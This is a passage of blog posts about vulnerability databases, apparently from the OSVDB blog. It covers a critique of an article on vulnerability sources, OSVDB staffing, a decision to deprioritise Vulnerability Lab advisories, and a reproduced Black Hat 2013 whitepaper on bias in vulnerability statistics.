Actually, they do focus on OS vulnerabilities and that can routinely be seen on their site. As I write this, 2 of the 5 vulnerabilities listed on the front page are in operating systems. The biggest thing to note about this offering is that publicly, they just don’t aggregate a significant volume of vulnerabilities for public consumption. Their most recent ID is 1037091, meaning they have ~ 37,000 entries in their database. Note that they operate like CVE though, where multiple vulnerabilities can be associated with a single ID. Regardless, reading their Weekly Vulnerability Summary emails for the past five weeks shows their volume: Sep 26 2016 (32 alerts), Oct 3 2016 (17 alerts), Oct 10 2016 (26), Oct 17 2016 (31), and Oct 24 2016 (32 alerts). To put that into perspective, VulnDB averages 46 new entries a day in 2016, with the most being 224 in a single day in 2016. For the most part, SecurityTracker may beat CVE on adding to the database, but they are almost entirely covering entries that have CVE IDs.

Page 9 tells readers about the Open Vulnerability And Assessment Language (OVAL) Interpreter And Repository. This is a curious addition to the article because it is not a source of vulnerability intelligence. Instead, it is a standard for reporting about systems. From the OVAL page:

OVAL® International in scope and free for public use, OVAL is an information security community effort to standardize how to assess and report upon the machine state of computer systems. OVAL includes a language to encode system details, and an assortment of content repositories held throughout the community.

While OVAL is certainly useful to some organizations, it does not belong in a list of vulnerability sources.

Page 10 tells readers about Information Sharing And Analysis Centers (ISACs). This is another curious addition as ISACs typically trade information on active attacks, threat actors, and which vulnerabilities may be targeted more heavily. They are generally not a source of vulnerabilities in the same context as most of the resources above.

In summary, Sean Martin’s article says it will share “9 Sources For Tracking New Vulnerabilities”. In reality, based on that quote and context, the article only tells readers about CVE/NVD, CERT VNDB, RBS VulnDB, and SecurityTracker. Several of the sources listed are not really for tracking new vulnerabilities, rather augment the vulnerability threat intelligence in various ways.

OSVDB – How many people work on this project?

[This was originally published on the OSVDB blog.]

We are occasionally asked how many people work on OSVDB. This question comes from those familiar with the project, and potential customers of our vulnerability intelligence feed. Back in the day, I had no problem answering it quickly and honestly. For years we limped along with one “full time” (unpaid volunteer) and a couple part-timers (unpaid volunteers), where those terms were strictly based on the hours worked. Since the start of 2012 though, we have had actual full-timers doing daily work on the project. This comes through the sponsorship provided by Risk Based Security (RBS), who also provided us with a good amount of developer time and hosting resources. Note that we are also frequently asked how much data comes from the community, to which we giggle and answer “virtually none” (less than 0.01%).

These days however, I don’t like to answer that question because it frequently seems to be a recipe for critique. For example, on one potential client call we were asked how many employees RBS had working on the offering. I answered honestly, that it was only three at time, because that was technically true. That didn’t represent the number of bodies as one was full-time but not RBS, and two were not full time. Before that could be qualified the potential client scoffed loudly, “there is no way you do that much with so few people”. Despite explaining that we had more than three people, I simply offered for them to enjoy a 30 day free trial of our data feed. Let the data answer his question.

To this day, if we say we have #lownumber, we get the response above. If we say we have #highnumber that includes part timers and drive-by employees (that are not tasked with this work but can dabble if they like), then we face criticism that we don’t output enough. Yes, despite us aggregating and producing over twice as much content as any of our competitors, we face that silly opinion. The number of warm bodies also doesn’t speak to the skill level of everyone involved. Two of our full time workers (one paid, one unpaid) have extensive history managing vulnerability databases and have continually evolved the offerings over the years. While most VDBs look the same as they did 10 years ago, OSVDB has done a lot to aggregate more data and more meta-data about each vulnerability than anyone else. We have been ahead of the curve at almost every turn, understanding and adapting to the challenges and pitfalls of VDBs.

So to officially answer the question, how many people work on this project? We have just enough. We make sure that we have the appropriate resources to provide the services offered. When we get more customers, we’ll hire more people to take on the myriad of additional projects and data aggregation we have wanted to do for years. Data that we feel is interesting and relevant, but no one is asking for yet. Likely because they haven’t thought of it, or haven’t realized the value of it. We have a lot more in store, and it is coming sooner than later now that we have the full support of RBS. If you are using any other vulnerability intelligence feed, it is time to consider the alternative.

We’re Doing the Unthinkable

[This was originally published on the OSVDB blog.]

Anyone who knows me in the context of vulnerability databases will find this post a tad shocking, even if they have endured my rants about it before.

For the first time ever, I am making it policy that we will no longer put any priority on Vulnerability Labs advisories. For those unfamiliar with the site, it is run by Benjamin Kunz Mejri who now has a new company Evolution Security.

If you read that web site, and even a history of his/VL disclosures, it looks impressive on the surface. Yes, they have found some legitimate vulnerabilities, even in high-profile vendors. Most, if not all, are pedestrian web application vulnerabilities such as cross-site scripting, traversals, or file upload issues. More complex vulnerabilities like overflows typically end up being what we call “self hacks”, and do not result in the crossing of privilege boundaries. Many of their published vulnerabilities require excessive conditions and offer no real exploit scenario.

During the past 10 months, I know of three other vulnerability databases that officially gave up on adding their advisories. Nothing public, but the internal memo was “don’t bother”. OSVDB was the holdout. We did our best to keep up with their stream of horrible advisories. I personally offered to help them re-write and refine their advisory process several times. I started out nicely, giving a sincere offer of my time and experience, and it went unanswered. I slowly escalated, primarily on Twitter, giving them grief over their disclosures. Eventually, their advisories became nothing but an annoyance and incredible time sink. Then I got ugly, and I have been to this day. No, not my proudest moment, but I stand by it 100%.

As of tonight, we are giving in as well. Vulnerability Lab advisories represent too much of a time sink, trying to decipher their meaning, that they simply aren’t worth adding. For cases where the software is more notable, we will continue to slam our head against the wall and figure them out. For the rest, they are getting deprioritized in the form of a “to do when we run out of other import sources”. Since we monitor over 1,100 sources including blogs, web sites, changelogs, and bug trackers, this is not happening for a long time.

I truly regret having to do this. One of my biggest joys of running a vulnerability database is in cataloging all the vulnerabilities. ALL OF THEM.

So this also serves as my final offer Benjamin. Search the VDBs out there and notice how few of your advisories end up in them. Think about why that is. If you are as smart as you think you are, you will choke down your pride and accept my offer of help. I am willing to sink a lot of time into helping you improve your advisories. This will in turn help the rest of the community, and what I believe are your fictitious customers. As I have told you several times before, there is no downside to this for you, just me. I care about helping improve security. Do you?

Buying Into the Bias: Why Vulnerability Statistics Suck

[This was originally published on the OSVDB blog.]

Last week, Steve Christey and I gave a presentation at Black Hat Briefings 2013 in Las Vegas about vulnerability statistics. We submitted a brief whitepaper on the topic, reproduced below, to accompany the slides that are now available.


Buying Into the Bias: Why Vulnerability Statistics Suck
By Steve Christey (MITRE) and Brian Martin (Open Security Foundation)
July 11, 2013

Academic researchers, journalists, security vendors, software vendors, and professional analysts often analyze vulnerability statistics using large repositories of vulnerability data, such as “Common Vulnerabilities and Exposures” (CVE), the Open Sourced Vulnerability Database (OSVDB), and other sources of aggregated vulnerability information. These statistics are claimed to demonstrate trends in vulnerability disclosure, such as the number or type of vulnerabilities, or their relative severity. Worse, they are typically misused to compare competing products to assess which one offers the best security.

Most of these statistical analyses demonstrate a serious fault in methodology, or are pure speculation in the long run. They use the easily-available, but drastically misunderstood data to craft irrelevant questions based on wild assumptions, while never figuring out (or even asking the sources about) the limitations of the data. This leads to a wide variety of bias that typically goes unchallenged, that ultimately forms statistics that make headlines and, far worse, are used to justify security budget and spending.

As maintainers of two well-known vulnerability information repositories, we’re sick of hearing about research that is quickly determined to be sloppy after it’s been released and gained public attention. In almost every case, the research casts aside any logical approach to generating the statistics. They frequently do not release their methodology, and they rarely disclaim the serious pitfalls in their conclusions. This stems from their serious lack of understanding about the data source they use, and how it operates. In short, vulnerability databases (VDBs) are very different and very fickle creatures. They are constantly evolving and see the world of vulnerabilities through very different glasses.

This paper and its associated presentation introduce a framework in which vulnerability statistics can be judged and improved. The better we get about talking about the issues, the better the chances of truly improving how vulnerability statistics are generated and interpreted.

Bias, We All Have It

Bias is inherent in everything humans do. Even the most rigorous and well-documented process can be affected by levels of bias that we simply do not understand are working against us. This is part of human nature. As with all things, bias is present in the creation of the VDBs, how the databases are populated with vulnerability data, and the subsequent analysis of that data. Not all bias is bad; for example, VDBs have a bias to avoid providing inaccurate information whenever possible, and each VDB effectively has a customer base whose needs directly drive what content is published.

Bias comes in many forms that we see as strongly influencing vulnerability statistics, via a number of actors involved in the process. It is important to remember that VDBs catalog the public disclosure of security vulnerabilities by a wide variety of people with vastly different skills and motivations. The disclosure process varies from person to person and introduces bias for sure, but even before the disclosure occurs, bias has already entered the picture.

Consider the general sequence of events that lead to a vulnerability being cataloged in a VDB.

  1. A researcher chooses a piece of software to examine.
  2. Each researcher operates with a different skill set and focus, using tools or techniques with varying strengths and weaknesses; these differences can impact which vulnerabilities are capable of being discovered.
  3. During the process, the researcher will find at least one vulnerability, often more.
  4. The researcher may or may not opt for vendor involvement in verifying or fixing the issue.
  5. At some point, the researcher may choose to disclose the vulnerability. That disclosure will not be in a common format, may suffer from language barriers, may not be technically accurate, may leave out critical details that impact the severity of the vulnerability (e.g. administrator authentication required), may be a duplicate of prior research, or introduce a number of other problems.
  6. Many VDBs attempt to catalog all public disclosures of information. This is a “best effort” activity, as there are simply too many sources for any one VDB to monitor, and accuracy problems can increase the expense of analyzing a single disclosure.
  7. If the VDB maintainers see the disclosure mentioned above, they will add it to the database if it meets their criteria, which is not always public. If the VDB does not see it, they will not add it. If the VDB disagrees with the disclosure (i.e. believes it to be inaccurate), they may not add it.

By this point, there are a number of criteria that may prevent the disclosure from ever making it into a VDB. Without using the word, the above steps have introduced several types of bias that impact the process. These biases carry forward into any subsequent examination of the database in any manner.

Types of Bias

Specific to the vulnerability disclosure aggregation process that VDBs go through every day, there are four primary types of bias that enter the picture. Note that while each of these can be seen in researchers, vendors, and VDBs, some are more common to one than the others. There are other types of bias that could also apply, but they are beyond the scope of this paper.

Selection bias covers what gets selected for study. In the case of disclosure, this refers to the researcher’s bias in selecting software and the methodology used to test the software for vulnerabilities; for example, a researcher might only investigate software written in a specific language and only look for a handful of the most common vulnerability types. In the case of VDBs, this involves how the VDB discovers and handles vulnerability disclosures from researchers and vendors. Perhaps the largest influence on selection bias is that many VDBs monitor a limited source of disclosures. It is not necessary to argue what “limited” means. Suffice it to say, no VDB is remotely complete on monitoring every source of vulnerability data that is public on the net. Lack of resources – primarily the time of those working on the database – causes a VDB to prioritize sources of information. With an increasing number of regional or country-based CERT groups disclosing vulnerabilities in their native tongue, VDBs have a harder time processing the information. Each vulnerability that is disclosed but does not end up in the VDB, ultimately factors into statistics such as “there were X vulnerabilities disclosed last year”.

Publication bias governs what portion of the research gets published. This ranges from “none”, to sparse information, to incredible technical detail about every finding. Somewhere between selection and publication bias, the researcher will determine how much time they are spending on this particular product, what vulnerabilities they are interested in, and more. All of this folds into what gets published. VDBs may discover a researcher’s disclosure, but then decide not to publish the vulnerability due to other criteria.

Abstraction bias is a term that we crafted to explain the process that VDBs use to assign identifiers to vulnerabilities. Depending on the purpose and stated goal of the VDB, the same 10 vulnerabilities may be given a single identifier by one database, and 10 identifiers by a different one. This level of abstraction is an absolutely critical factor when analyzing the data to generate vulnerability statistics. This is also the most prevalent source of problems for analysis, as researchers rarely understand the concept of abstraction, why it varies, and how to overcome it as an obstacle in generating meaningful statistics. Researchers will use whichever abstraction is most appropriate or convenient for them; after all, there are many different consumers for a researcher advisory, not just VDBs. Abstraction bias is also frequently seen in vendors, and occasionally researchers in the way they disclose one vulnerability multiple times, as it affects different software that bundles additional vendor’s software in it.

Measurement bias refers to potential errors in how a vulnerability is analyzed, verified, and catalogued. For example, with researchers, this bias might be in the form of failing to verify that a potential issue is actually a vulnerability, or in over-estimating the severity of the issue compared to how consumers might prioritize the issue. With vendors, measurement bias may affect how the vendor prioritizes an issue to be fixed, or in under-estimating the severity of the issue. With VDBs, measurement bias may also occur if analysts do not appropriately reflect the severity of the issue, or if inaccuracies are introduced while studying incomplete vulnerability disclosures, such as missing a version of the product that is affected by the vulnerability. It could be argued that abstraction bias is a certain type of measurement bias (since it involves using inconsistent “units of measurement”), but for the purposes of understanding vulnerability statistics, abstraction bias deserves special attention.

Measurement bias, as it affects statistics, is arguably the domain of VDBs, since most statistics are calculated using an underlying VDB instead of the original disclosures. As the primary sources of vulnerability data aggregation, several factors come into play when performing database updates.

Why Bias Matters, in Detail

These forms of bias can work together to create interesting spikes in vulnerability disclosure trends. To the VDB worker, they are typically apparent and sometimes amusing. To an outsider just using a data set to generate statistics, they can be a serious pitfall.

In August, 2008, a single researcher using rudimentary, yet effective methods for finding symlink vulnerabilities single handedly caused a significant spike in symlink vulnerability disclosures over the past 10 years. Starting in 2012 and continuing up to the publication of this paper, a pair of researchers have significantly impacted the number of disclosures in a single product. Not only has this caused a huge spike for the vulnerability count related to the product, it has led to them being ranked as two of the top vulnerability disclosers since January, 2012. Later this year, we expect there to be articles written regarding the number of supervisory control and data acquisition (SCADA) vulnerabilities disclosed from 2012 to 2013. Those articles will be based purely on vulnerability counts as determined from VDBs, likely with no mention of why the numbers are skewed. One prominent researcher who published many SCADA flaws has changed his personal disclosure policy. Instead of publicly disclosing details, he now keeps them private as part of a competitive advantage of his new business.

Another popular place for vulnerability statistics to break down is related to vulnerability severity. Researchers and journalists like to mention the raw number of vulnerabilities in two products and try to compare their relative security. They frequently overlook the severity of the vulnerabilities and may not note that while one product had twice as many disclosures, a significant percentage of them were low severity. Further, they do not understand how the industry-standard CVSSv2 scoring system works, or the bias that can creep in when using it to score vulnerabilities. Considering that a vague disclosure that has little actionable details will frequently be scored for the worst possible impact, that also drastically skews the severity ratings.

Conclusion

The forms of bias and how they may impact vulnerability statistics outlined in this paper are just the beginning. For each party involved, for each type of bias, there are many considerations that must be made. Accurate and meaningful vulnerability statistics are not impossible; they are just very difficult to accurately generate and disclaim.

Our 2013 BlackHat Briefings USA talk hopes to explore many of these points, outline the types of bias, and show concrete examples of misleading statistics. In addition, we will show how you can easily spot questionable statistics, and give some tips on generating and disclaiming good statistics.